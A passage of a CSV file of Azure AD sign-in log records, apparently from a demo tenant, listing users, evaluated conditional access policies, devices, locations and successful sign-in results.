+626,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,02:38.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,169892fb-8bed-4a71-9ded-eb0a44d35d16,Microsoft.aadiam,Microsoft.aadiam,,Jordan Ross,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 19:02,"{'operatingSystem': 'Windows 10', 'deviceId': '16377263-6c6e-4b1f-8679-1902a5731dc6', 'browser': 'Edge 81.0.416', 'displayName': 'MININT-E8D2OM5', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",3341be53-51ae-497a-816e-4862010a2f00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -122.14311981201172, 'latitude': 47.474830627441406}, 'state': 'Washington', 'city': 'Renton'}",none,none,none,none,[],{'errorCode': 0},Jordan Ross,d333c1f2-e2a3-4f8f-8370-35c29b543c62,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,3341be53-51ae-497a-816e-4862010a2f00,SigninLogs,Sucess,47.47483063,-122.1431198
+627,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:35.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,43d97c82-ebfb-4963-af7c-c7eb1874c336,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 19:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",0837a9e3-f941-4973-a561-a80d25e12000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,0837a9e3-f941-4973-a561-a80d25e12000,SigninLogs,Sucess,36.6404686,-78.26995087
+628,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,39:15.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,85224c1b-590f-46bf-8c5e-e6a86fbfb529,Microsoft.aadiam,Microsoft.aadiam,,Cristhofer Romeo Muñoz,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 19:39,"{'operatingSystem': 'Windows 10', 'deviceId': '7f732ad5-ac1d-4ebc-9553-15e7692c93a8', 'browser': 'Edge 80.0.361', 'displayName': 'MININT-QGUPO1L', 'trustType': 'Azure AD joined', 'isCompliant': True, 'isManaged': True}",dc4d4d5d-fa62-4065-85ef-63ef19890500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -73.97901916503906, 'latitude': 40.7589111328125}, 'state': 'New York', 'city': 'New York'}",none,none,none,none,[],{'errorCode': 0},Cristhofer Romeo Muñoz,f0c37589-c602-4575-a536-9b66feacf56c,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,dc4d4d5d-fa62-4065-85ef-63ef19890500,SigninLogs,Sucess,40.75891113,-73.97901917
+629,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,39:15.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,85224c1b-590f-46bf-8c5e-e6a86fbfb529,Microsoft.aadiam,Microsoft.aadiam,,Cristhofer Romeo Muñoz,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 19:39,"{'operatingSystem': 'Windows 10', 'deviceId': '7f732ad5-ac1d-4ebc-9553-15e7692c93a8', 'browser': 'Edge 80.0.361', 'displayName': 'MININT-QGUPO1L', 'trustType': 'Azure AD joined', 'isCompliant': True, 'isManaged': True}",dc4d4d5d-fa62-4065-85ef-63ef19890500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -73.97901916503906, 'latitude': 40.7589111328125}, 'state': 'New York', 'city': 'New York'}",none,none,none,none,[],{'errorCode': 0},Cristhofer Romeo Muñoz,f0c37589-c602-4575-a536-9b66feacf56c,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,dc4d4d5d-fa62-4065-85ef-63ef19890500,SigninLogs,Sucess,40.75891113,-73.97901917
+630,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,56:08.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,8de4ac4e-b5a5-40a1-9687-d713e337fe3d,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft Cloud App Security,05a65629-4c1b-48c1-a78b-804c4abdd4af,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 19:56,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",028ee73f-e71d-464b-b4fd-9db203252000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,028ee73f-e71d-464b-b4fd-9db203252000,SigninLogs,Sucess,33.7984581,-84.38828278
+631,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,55:04.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3ba70abd-1fdd-41ac-9bd0-1ac6a89652df,Microsoft.aadiam,Microsoft.aadiam,,Sentinel Partner Account 2,4,GB,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 12:55,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Firefox 74.0'}",0db84f87-d59a-4024-94d6-18fb6cf31300,,,"{'countryOrRegion': 'GB', 'geoCoordinates': {'longitude': -0.19916999340057373, 'latitude': 51.49555969238281}, 'state': 'Greater London', 'city': 'Kensington And Chelsea'}",none,none,none,none,[],{'errorCode': 0},Sentinel Partner Account 2,2f3450f9-6201-430f-9235-25062d3f412b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,0db84f87-d59a-4024-94d6-18fb6cf31300,SigninLogs,Sucess,51.49555969,-0.199169993
+632,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,04:05.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 20:04,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",4130ca1d-0d16-4aad-a433-406352472100,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,4130ca1d-0d16-4aad-a433-406352472100,SigninLogs,Sucess,33.0175209,35.44601059
+633,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,04:02.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 